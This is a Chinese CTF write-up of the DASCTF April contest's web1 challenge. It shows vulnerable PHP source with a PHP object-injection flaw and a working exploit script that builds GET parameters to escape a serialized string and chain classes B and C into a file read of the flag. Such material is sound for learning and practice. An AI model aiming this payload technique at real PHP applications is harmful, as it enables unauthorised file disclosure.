安恆月賽-四月賽web1

DASCTF_WEB1

源碼

<?php
show_source("index.php");
function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

class A{
    public $username;
    public $password;
    function __construct($a, $b){
        $this->username = $a;
        $this->password = $b;
    }
}

class B{
    public $b = 'gqy';
    function __destruct(){
        $c = 'a'.$this->b;
        echo $c;
    }
}

class C{
    public $c;
    function __toString(){
        //flag.txt
        echo file_get_contents($this->c);
        return 'nice';
    }
}

$a = new A($_GET['a'],$_GET['b']);
//省略了存儲序列化數據的過程,下面是取出來並反序列化的操作

$b = unserialize(read(write(serialize($a))));

參考:https://www.cnblogs.com/magic-zero/p/11643916.html

分析

function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

這兩個函數會因爲序列化的嚴格規則，造成字符串逃逸。

exp

<?php
class A{
    public $username;
    public $password;
}

class B{
    public $b = 'gqy';
}

class C{
    public $c = "flag.php";
}
$c = new C();
$b = new B();
$b->b = $c;

$exp = 'AAAA";s:5:"h3zh1";'.serialize($b);
$aa = "\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0";

echo "a=".$aa."&b=".$exp;